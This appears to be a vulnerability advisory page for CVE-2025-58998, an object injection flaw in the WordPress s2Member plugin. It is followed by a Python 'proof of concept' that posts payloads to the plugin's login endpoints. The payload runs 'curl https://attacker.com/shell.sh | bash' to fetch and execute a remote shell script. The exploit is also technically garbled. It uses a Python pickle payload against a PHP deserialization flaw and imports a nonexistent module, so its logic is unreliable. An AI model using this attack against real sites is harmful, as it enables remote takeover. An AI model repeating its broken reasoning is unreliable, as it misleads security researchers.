Deserialization of Untrusted Data vulnerability in Cristián Lávaque s2Member s2member allows Object Injection.This issue affects s2Member: from n/a through <= 250701.
CVSS Details
CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Configurations (Affected Products)
No configuration data available.
s2Member插件所有版本 <= 250701
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import base64
import serialized_payload
# CVE-2025-58998 PoC - WordPress s2Member Object Injection
# Target: WordPress site with s2Member plugin <= 250701
TARGET_URL = "http://target-wordpress-site.com"
# Generate malicious serialized object for PHP object injection
# This creates a payload that triggers __destruct() or __wakeup() methods
class EvilClass:
def __reduce__(self):
# This will execute system command via eval()
cmd = "curl https://attacker.com/shell.sh | bash"
return (eval, (cmd,))
def generate_payload():
"""Generate serialized PHP object for exploitation"""
import pickle
evil_obj = EvilClass()
serialized = pickle.dumps(evil_obj)
return base64.b64encode(serialized).decode()
def exploit():
"""Send malicious payload to vulnerable endpoint"""
payload = generate_payload()
# Target s2Member's processing endpoint
endpoints = [
"/wp-admin/admin-ajax.php",
"/wp-login.php",
"/?s2member_pro_shortcode_login=1"
]
for endpoint in endpoints:
data = {
"action": "s2member_pro_shortcode_login",
"s2member_pro_logins": payload,
"s2member_pro_logins_bc": payload
}
try:
response = requests.post(
TARGET_URL + endpoint,
data=data,
timeout=10
)
print(f"[*] Sent payload to {endpoint}")
print(f"[*] Response status: {response.status_code}")
except requests.exceptions.RequestException as e:
print(f"[!] Error: {e}")
if __name__ == "__main__":
print("CVE-2025-58998 - s2Member Object Injection PoC")
exploit()